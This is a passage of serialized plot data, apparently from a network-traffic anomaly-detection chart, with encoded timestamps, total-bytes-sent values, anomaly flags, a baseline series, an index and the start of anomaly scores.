AAHutdkIAAKhvfq12QgAAkN6BrXZCAAB4TYWtdkIAAGC8iK12QgAASCuMrXZCAAAwmo+tdkIAABgJk612QgAAAHiWrXZCAADo5pmtdkIAANBVna12QgAAuMSgrXZCAACgM6StdkIAAIiip612QgAAcBGrrXZCAABYgK6tdkIAAEDvsa12QgAAKF61rXZCAAAQzbitdkIAAPg7vK12QgAA4Kq/rXZCAADIGcOtdkIAALCIxq12QgAAmPfJrXZCAACAZs2tdkIAAGjV0K12QgAAUETUrXZCAAA4s9etdkIAACAi2612QgAACJHerXZCAADw/+GtdkIAANhu5a12QgAAwN3orXZCAACoTOytdkIAAJC77612QgAAeCrzrXZCAABgmfatdkIAAEgI+q12QgAAMHf9rXZCAAAY5gCudkIAAABVBK52QgAA6MMHrnZCAADQMguudkIAALihDq52QgAAoBASrnZCAACIfxWudkIAAHDuGK52QgAAWF0crnZCAABAzB+udkIAACg7I652QgAAEKomrnZCAAD4GCqudkIAAOCHLa52QgAAyPYwrnZCAACwZTSudkIAAJjUN652QgAAgEM7rnZCAABosj6udkIAAFAhQq52QgAAOJBFrnZCAAAg/0iudkIAAAhuTK52QgAA8NxPrnZCAADYS1OudkIAAMC6Vq52QgAAqClarnZCAACQmF2udkIAAHgHYa52QgAAYHZkrnZCAABI5WeudkIAADBUa652QgAAGMNurnZCAAAAMnKudkIAAOigda52QgAA0A95rnZCAAC4fnyudkIAAKDtf652QgAAiFyDrnZCAABwy4audkIAAFg6iq52QgAAQKmNrnZCAAAoGJGudkIAABCHlK52QgAA+PWXrnZCAADgZJuudkIAAMjTnq52QgAAsEKirnZCAACYsaWudkIAAIAgqa52QgAAaI+srnZCAABQ/q+udkIAADhts652QgAAINy2rnZCAAAIS7qudkIAAPC5va52QgAA2CjBrnZCAADAl8SudkIAAKgGyK52QgAAkHXLrnZCAAB45M6udkIAAGBT0q52QgAASMLVrnZCAAAwMdmudkIAABig3K52QgAAAA/grnZCAADofeOudkIAANDs5q52QgAAuFvqrnZCAACgyu2udkIAAIg58a52QgAAcKj0rnZCAABYF/iudkIAAECG+65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\",\"dtype\":\"float64\",\"shape\":[840]},\"TotalBytesSent\":[873713587,882187669,852506841,898793650,891598085,893022551,922677236,856663011,830763825,855292297,867265088,783423911,797876828,790012871,852519704,801772685,807320821,811995775,857108417,668803434,644214662,716435846,718165305,846441590,913851950,909281093,910496479,860491701,907134623,951830968,863445775,883803886,947731570,897928218,862303611,891357428,874557665,802427120,869716161,851558231,906453909,843625312,807469579,695427997,643948011,677938461,666457868,890567174,920136656,864647530,865802529,937646970,918357380,889610303,913645805,887186534,965532850,825807779,903819076,827999022,916732278,903529290,869875766,877268278,901985353,820902488,839550728,697140933,725116765,718391605,734634539,961618771,973519876,931452710,936782632,902828719,956018750,901050381,986348136,888182919,895773023,860244868,894638180,932630230,877076050,904708616,885212895,928834714,882928145,897273726,845388269,730597647,733994909,696100730,677795812,944003798,940124451,903070877,966821399,928572732,968103682,942345100,918154112,908724455,969661489,869552513,928906452,858754943,852800036,956027685,899862034,914327713,868670704,863683195,905245396,698524204,751378763,788098393,718327017,457637899,407128034,427965408,416582611,405735621,475934081,391911247,382779518,418150700,439492547,344212429,385151272,402634638,348130418,330143017,412007535,354978767,383963655,426783985,402920595,216671778,186952988,256555183,237640219,459615281,450916734,439791726,407339745,460514032,473271204,42271963,452867549,433833905,412908587,399529976,351788448,357793541,420058661,388618694,344244340,384677308,350548288,433051287,434604199,227336212,181142300,225420990,242379095,1022669703,953364734,1033085221,969714599,1013729943,981345529,1037288750,991165062,984493550,978367044,938879683,955831823,905906975,957606717,929509010,1002659157,935735110,930332470,956107825,984858191,855085656,753446631,806497013,799747641,1026442326,1077848994,1042074279,989569304,1057453529,1057338096,1067745732,1039937078,634395781,1038853034,988661138,971145433,1020524701,1023040605,1026067148,974899180,925481646,1008014066,978065792,976248064,788591993,819890342,776408096,826110086,1034936595,1039212114,1022464025,1075642770,1055035913,1061634536,1076072442,1061904372,1051809129,1055544997,1039038521,946540104,982693333,1040505474,963020903,1017382900,974943158,986877436,977686629,946411386,818997628,799954180,862299582,836341534,1025090070,1007907120,1027324682,1016950649,1090135061,1066631292,1087552149,1011146902,1096276461,1053690335,1026041317,995544290,964045673,1007207382,976018535,1044530213,1056525176,1009998583,1020296930,996836955,858490388,830213157,845167877,837203412,1100015423,1074240368,1085046504,1119540427,1066062542,1111993335,1074743022,1075393902,1096429594,1104942722,1043375756,1004789142,1009115136,1036882213,998556234,1061527144,1059037422,982935955,1070078489,1074805675,823993813,845965247,908350645,909155856,594596972,588339826,513974580,498608477,564220831,526136510,537404241,503702057,562529456,565679688,446033781,493641472,916767394,467545424,466436663,459461022,486413184,538919515,494288347,503115084,338429270,376607397,335536198,305752110,579716989,607277895,580925641,591887341,535053510,542852243,600980027,572841825,610227565,597944660,478582894,533450021,523528503,483109880,575159745,542252387,545441292,575681208,566276013,572591706,353152221,351089795,402680601,398099696,1124558087,1094578207,1149602244,1127141868,1188500821,1171529151,1137436272,1134543931,1102054311,1085571380,1079571807,1085991361,1056982073,1133881950,1064259706,1083322471,1110532757,1116891783,1069608690,1138721940,891550671,930699055,913962202,880548252,1163276194,1118538836,1134609747,1197648313,1140866762,1124279760,1202915026,1156873076,1189829422,1190081828,1089603867,1150060587,1067572234,1077762137,1101599618,1125614650,1054136082,1160099162,1097202834,1140124125,999404394,930962307,984346459,989561872,1212679768,1143875331,1175140739,1136172485,1216091392,1166238768,1213483016,1141226357,1142413009,1202291677,1096804116,1103237642,1136332093,1078214113,1082330918,1105565630,1555286702,1170305747,1081316124,1105199753,921977750,983638609,994542648,963769124,1181536839,1201880958,1221525336,1183995519,1230322064,1155522276,1188888461,1145193164,1155701298,1188033929,1085635585,1119451105,1174983532,1189287942,1104109113,1112397263,1187541501,1132189425,1176740195,1193123726,997973374,987071459,1016780205,1022792246,1259584702,1171617419,1201434219,1197268131,1246202606,1193402296,1179520250,1229313145,1242054018,1213590384,1211392931,1210114874,1143940643,1125394273,1108593833,1155662210,1163561397,1163391090,1158459579,1146162232,1012664439,1006936386,1032638042,964323187,726832364,673815250,673077290,683083834,641410712,728453985,641745207,704815291,726998848,657695371,652574108,613671163,603748816,638653988,662712107,597580224,605047075,662654036,608539632,688872417,514920636,447879593,510485297,484271754,676461315,660568258,702440857,675871159,725286517,670973900,727885782,744687972,675085296,651879749,665241172,627295101,683310114,607687695,667111982,646866052,655118217,614153533,703929185,687145906,491031685,475837204,527835918,536374191,1233566650,1302272008,1289104217,1281107991,1278953301,1232111868,1294651802,1240461427,1305202257,1296015157,1265505042,1203512594,1255884232,1231314521,1186407921,1166835959,1205765612,1166356313,1223852614,1269667059,1041230333,1108569577,1032000916,1055812151,1234663961,1293752411,1312405451,1272792567,1244937177,1228548121,1246364826,1327024928,1243726839,1246608903,1266850172,1250452305,1236222417,1261777865,1241712737,1188691842,1290406309,1237931166,1286266734,1254724526,1024325551,1129096497,1094744542,1106153922,1271645012,1347794452,1351655119,1334942686,1251176674,1269615109,1344451748,1314975114,1337578152,1348381350,1299125075,1261105761,1295117140,1275566823,1218600630,1205956592,1228909763,1280308251,1293029712,1209380432,1119365150,1060920766,1061436742,1094057836,1338597036,1313165433,1363214977,1291210639,1301482144,1298243874,1324592383,1346187572,1346602309,1307023171,1246832320,1320019656,1322110891,1289406441,1245116093,1233689715,1246103258,1282225691,1324849514,1264425198,1085445814,1103826656,1135021543,1093951930,1768911488,1344644367,1325119826,1352683245,1388311605,1386178294,1314885144,1390097286,1340372349,1308315998,1248477459,1307770976,1277794700,1301026627,1275879844,1337627540,1266847511,1250826284,1250775463,1303065742,1083159258,1075790124,1124244637,1142869516,844634233,831852994,858119325,756699030,859346504,782955826,766149662,820109225,843569927,862042352,772626268,741265353,752637777,711080800,787329634,760437876,775861416,707501549,786003450,782503059,651765460,613346276,641089364,588356946,825822420,820488600,839810018,816681132,806727645,862121762,850428593,833831322,837988090,882639328,812175783,788758153,736528580,763329213,782038749,792206615,812923462,737361821,808975990,806454559,654882781,595837479,615062385,605973282,1368926432,1355926496,1348926724,1337306282,1410566043,1341735073,1343795224,1435220844,1379367502,1384310206,1365457344,1360152030,1366919111,1376774721,1338677133,1379408603,1326759966,1337344137,1365622686,1390260265,1162133464,1191190594,1172019258,1209471254,1418034087,1363742046,1425275938,1432759288,1380549618,1398671177,1405068973,1385686319,1409991781,1447319641,1380666340,1333216667,1322760361,1398705231,1315549876,1356737170,1394306054,1322876966,1353514970,1333873537,1226651039,1255761136,1231513058,1168746496,1416639066,1427112735,1461381214,1412016648,1447531904,1477902019,1394862023,1477340485,1483015065,1443581624,1404994511,1326704915,1405705118,1432086031,1349510015,1372709257,1426258965,1400670563,1393785274,1360268291,1227162238,1260832816,1263051135,1269304066,1442954939,1495282173,1489786658,1448466267,1480962739,1398602833,1469105751,1468864803,1412196168,1400145473,1439154948,1441755515,1451670670,1414405345,1361733906,1389770777,1389767204,1357535607,1412196256,1361244164,1214116379,1218696527,1236011876,1258844480,1471186871,1407500147,1505744090,1475423157,1480762935,1503614110,1496402547,1417036285,1437493594,1493592827,1436181558,1441047945,993152841,1453223308,1373485407,1471798370,1419431171,1453799427,1372937500,1379938036,1284457376,1287902888,1236144771,1261400942,960208787,939095822,930978685,944830098,925097517,986308242,919493841,927218360,971499707,955771283,834582332,852630670,874504602,914012315,834761544,908744348,853162780,922265182,859919693,930111090,737693868,722223752,758772577,706415711,994897470,974844971,916462999,965722723,913345256,900491348,917100812,905215807,910648863,1008418310,900965862,870174355,876299048,878786944,874525847,953351422,961309357,910212834,913189663,946670363,754488773,762510726,746115005,744582340,1469756566],\"anomalies\":[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,-1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0],\"baseline\":[782728212,838492449,816772273,878871426,862639955,829287276,827135135,795385715,779642984,774383611,781543365,753274276,830914353,762032309,781835274,809785760,816884986,770342093,840195542,593764473,633653057,617656404,584982654,868450796,824453638,841264748,905043514,849002163,833155361,912530827,867229077,900925622,901918228,802180467,863377387,781629234,792559337,817137018,841892249,771153881,877857161,815701033,859362524,719382993,651681106,705805457,711761070,935619166,867554929,899560537,861332483,941991590,892879165,940863613,869347154,871274006,931892874,827145513,834319239,868153889,810776109,815633114,839608026,963692359,905828543,817579119,842202948,659721145,722122204,733766443,703733119,922241034,943325352,963709930,926920313,973987058,899927470,934033855,891078758,902327091,935399922,833741778,868297498,924570125,939614735,855176106,864204455,940088893,885477017,930767987,947891718,753481566,743319851,773768796,780521037,1018053693,930826610,961383610,957957722,1007632396,955572286,942430440,992963535,1006444608,978721174,977263921,976726063,776466525,893485862,877425622,925234199,933873586,934443479,930252167,918695020,785937427,780949574,807391430,739816775,503066152,450789237,450791477,461538221,420605299,508388772,422420194,486230478,509154234,440590957,436209894,398047149,537753963,424510374,449308692,384917009,393124060,451471221,398097017,479170002,305958421,239657577,303003481,277530138,470459899,455307042,497919841,472090343,522245900,468673483,526325565,543867955,475005479,452540132,466641755,429435883,486191096,411308877,471473364,451967634,460959999,420735515,511251366,495208287,299834266,285379985,338118899,347397372,1045330030,907081787,962846024,941125848,1003225001,986993531,953640852,951488710,919739290,903996559,898737186,905896940,877627852,955267929,886385884,906188849,934139335,941238561,894695668,964549118,718118049,758006632,742009979,709336229,992804371,948807213,965618324,1029397090,973355738,957508936,1036884402,991582652,1025279198,1026271804,926534042,987730962,905982809,916912912,941490593,966245825,895507457,1002210736,940054608,983716099,843736568,776034681,830159033,836114646,1059972741,991908504,1023914112,985686058,1066345165,1017232741,1065217189,993700729,995627581,1056246449,951499088,958672814,992507465,935129685,939986689,963961601,1088045934,1030182118,941932695,966556524,784074720,846475779,858120018,828086694,1046594609,1067678928,1088063506,1051273888,1098340633,1024281045,1058387430,1015432333,1026680667,1059753498,958095353,992651073,1048923700,1063968310,979529681,988558031,1064442469,1009830592,1055121562,1072245293,877835141,867673426,898122372,904874613,1142407268,1055180185,1085737185,1082311297,1131985972,1079925862,1066784015,1117317110,1130798183,1103074749,1101617496,1101079639,900820101,1017839437,1001779197,1049587774,1058227161,1058797054,1054605743,1043048596,910291002,905303149,931745005,864170350,627419727,575142813,575145053,585891796,544958874,632742347,546773769,610584053,633507810,564944533,560563469,522400724,662107538,548863949,573662268,509270585,517477635,575824796,522450592,603523577,430311996,364011153,427357057,401883713,594813474,579660617,622273416,596443918,646599476,593027059,650679140,668221530,599359054,576893707,590995330,553789459,610544672,535662452,595826939,576321209,585313574,545089090,635604942,619561863,424187841,409733560,462472474,471750947,1169683606,1031435363,1087199599,1065479423,1127578576,1111347106,1077994427,1075842286,1044092866,1028350134,1023090761,1030250515,1001981427,1079621504,1010739460,1030542425,1058492910,1065592136,1019049243,1088902693,842471624,882360208,866363555,833689804,1117157946,1073160788,1089971899,1153750665,1097709314,1081862512,1161237977,1115936227,1149632773,1150625379,1050887618,1112084538,1030336384,1041266487,1065844168,1090599400,1019861032,1126564312,1064408184,1108069674,968090143,900388256,954512608,960468221,1184326317,1116262080,1148267687,1110039633,1190698740,1141586316,1189570764,1118054305,1119981157,1180600024,1075852663,1083026389,1116861040,1059483260,1064340265,1088315177,1212399509,1154535693,1066286270,1090910099,908428296,970829355,982473593,952440269,1170948184,1192032503,1212417081,1175627464,1222694209,1148634620,1182741005,1139785908,1151034242,1184107073,1082448929,1117004649,1173277275,1188321885,1103883256,1112911606,1188796044,1134184168,1179475138,1196598868,1002188716,992027001,1022475947,1029228188,1266760844,1179533761,1210090760,1206664872,1256339547,1204279437,1191137591,1241670686,1255151758,1227428324,1225971071,1225433214,1025173676,1142193013,1126132773,1173941349,1182580736,1183150629,1178959318,1167402171,1034644578,1029656725,1056098580,988523925,751773302,699496388,699498628,710245372,669312450,757095922,671127344,734937628,757861385,689298108,684917045,646754300,786461113,673217524,698015843,633624160,641831211,700178372,646804167,727877152,554665571,488364728,551710632,526237289,719167050,704014192,746626991,720797493,770953051,717380634,775032716,792575106,723712629,701247282,715348905,678143034,734898247,660016028,720180515,700674784,709667149,669442665,759958517,743915438,548541417,534087136,586826049,596104522,1294037181,1155788938,1211553175,1189832999,1251932151,1235700681,1202348002,1200195861,1168446441,1152703710,1147444337,1154604090,1126335002,1203975079,1135093035,1154896000,1182846486,1189945712,1143402818,1213256268,966825199,1006713783,990717130,958043380,1241511522,1197514363,1214325474,1278104240,1222062889,1206216087,1285591553,1240289803,1273986348,1274978954,1175241193,1236438113,1154689960,1165620063,1190197743,1214952975,1144214607,1250917887,1188761759,1232423250,1092443719,1024741831,1078866183,1084821796,1308679892,1240615655,1272621263,1234393209,1315052315,1265939891,1313924339,1242407880,1244334732,1304953600,1200206239,1207379964,1241214615,1183836835,1188693840,1212668752,1336753085,1278889269,1190639845,1215263674,1032781871,1095182930,1106827169,1076793845,1295301759,1316386078,1336770656,1299981039,1347047784,1272988196,1307094581,1264139483,1275387817,1308460648,1206802504,1241358224,1297630851,1312675461,1228236831,1237265181,1313149619,1258537743,1303828713,1320952444,1126542292,1116380576,1146829522,1153581763,1391114419,1303887336,1334444336,1331018448,1380693122,1328633012,1315491166,1366024261,1379505334,1351781900,1350324646,1349786789,1149527251,1266546588,1250486348,1298294925,1306934312,1307504204,1303312893,1291755746,1158998153,1154010300,1180452156,1112877501,876126877,823849963,823852203,834598947,793666025,881449498,795480920,859291203,882214960,813651683,809270620,771107875,910814689,797571100,822369418,757977735,766184786,824531947,771157743,852230728,679019146,612718303,676064207,650590864,843520625,828367768,870980567,845151068,895306626,841734209,899386291,916928681,848066205,825600858,839702480,802496609,859251822,784369603,844534090,825028360,834020725,793796240,884312092,868269013,672894992,658440711,711179625,720458097,1418390756,1280142513,1335906750,1314186574,1376285727,1360054257,1326701577,1324549436,1292800016,1277057285,1271797912,1278957666,1250688578,1328328654,1259446610,1279249575,1307200061,1314299287,1267756394,1337609844,1091178774,1131067358,1115070705,1082396955,1365865097,1321867939,1338679050,1402457815,1346416464,1330569662,1409945128,1364643378,1398339924,1399332529,1299594768,1360791688,1279043535,1289973638,1314551319,1339306551,1268568182,1375271462,1313115334,1356776825,1216797294,1149095407,1203219759,1209175371,1433033467,1364969230,1396974838,1358746784,1439405891,1390293467,1438277914,1366761455,1368688307,1429307175,1324559814,1331733540,1365568191,1308190410,1313047415,1337022327,1461106660,1403242844,1314993421,1339617249,1157135446,1219536505,1231180744,1201147420,1419655335,1440739654,1461124231,1424334614,1471401359,1397341771,1431448156,1388493059,1399741393,1432814223,1331156079,1365711799,1421984426,1437029036,1352590407,1361618757,1437503194,1382891318,1428182288,1445306019,1250895867,1240734152,1271183098,1277935338,1515467994,1428240911,1458797911,1455372023,1505046698,1452986587,1439844741,1490377836,1503858909,1476135475,1474678222,1474140365,1273880826,1390900163,1374839923,1422648500,1431287887,1431857780,1427666469,1416109321,1283351728,1278363875,1304805731,1237231076,1000480453,948203539,948205778,958952522,918019600,1005803073,919834495,983644779,1006568536,938005258,933624195,895461450,1035168264,921924675,946722994,882331310,890538361,948885522,895511318,976584303,803372722,737071879,800417782,774944439,967874200,952721343,995334142,969504644,1019660202,966087784,1023739866,1041282256,972419780,949954433,964056056,926850185,983605397,908723178,968887665,949381935,958374300,918149816,1008665668,992622588,797248567,782794286,835533200,844811673,1542744332],\"index\":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,262,263,264,265,266,267,268,269,270,271,272,273,274,275,276,277,278,279,280,281,282,283,284,285,286,287,288,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,325,326,327,328,329,330,331,332,333,334,335,336,337,338,339,340,341,342,343,344,345,346,347,348,349,350,351,352,353,354,355,356,357,358,359,360,361,362,363,364,365,366,367,368,369,370,371,372,373,374,375,376,377,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,399,400,401,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,420,421,422,423,424,425,426,427,428,429,430,431,432,433,434,435,436,437,438,439,440,441,442,443,444,445,446,447,448,449,450,451,452,453,454,455,456,457,458,459,460,461,462,463,464,465,466,467,468,469,470,471,472,473,474,475,476,477,478,479,480,481,482,483,484,485,486,487,488,489,490,491,492,493,494,495,496,497,498,499,500,501,502,503,504,505,506,507,508,509,510,511,512,513,514,515,516,517,518,519,520,521,522,523,524,525,526,527,528,529,530,531,532,533,534,535,536,537,538,539,540,541,542,543,544,545,546,547,548,549,550,551,552,553,554,555,556,557,558,559,560,561,562,563,564,565,566,567,568,569,570,571,572,573,574,575,576,577,578,579,580,581,582,583,584,585,586,587,588,589,590,591,592,593,594,595,596,597,598,599,600,601,602,603,604,605,606,607,608,609,610,611,612,613,614,615,616,617,618,619,620,621,622,623,624,625,626,627,628,629,630,631,632,633,634,635,636,637,638,639,640,641,642,643,644,645,646,647,648,649,650,651,652,653,654,655,656,657,658,659,660,661,662,663,664,665,666,667,668,669,670,671,672,673,674,675,676,677,678,679,680,681,682,683,684,685,686,687,688,689,690,691,692,693,694,695,696,697,698,699,700,701,702,703,704,705,706,707,708,709,710,711,712,713,714,715,716,717,718,719,720,721,722,723,724,725,726,727,728,729,730,731,732,733,734,735,736,737,738,739,740,741,742,743,744,745,746,747,748,749,750,751,752,753,754,755,756,757,758,759,760,761,762,763,764,765,766,767,768,769,770,771,772,773,774,775,776,777,778,779,780,781,782,783,784,785,786,787,788,789,790,791,792,793,794,795,796,797,798,799,800,801,802,803,804,805,806,807,808,809,810,811,812,813,814,815,816,817,818,819,820,821,822,823,824,825,826,827,828,829,830,831,832,833,834,835,836,837,838,839],\"score\":{\"__ndarray__\":\"ZcNtHnTFzD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAG/ECYbPF0z8AAAAAAAAAAAAAAAAAAAAACefnhT7Koz8h3L4CpFPAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAArjQbuGWZ1z8WhHc9KBHwPwAAAAAAAAAA9wwmQOMEyT8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAY/jFbu8D1D8AAAAAAAAAABfxjRlgReI//UoD40EYrj8AAAAAAAAAAAAAAAAAAAAAktQRAoAKnj8A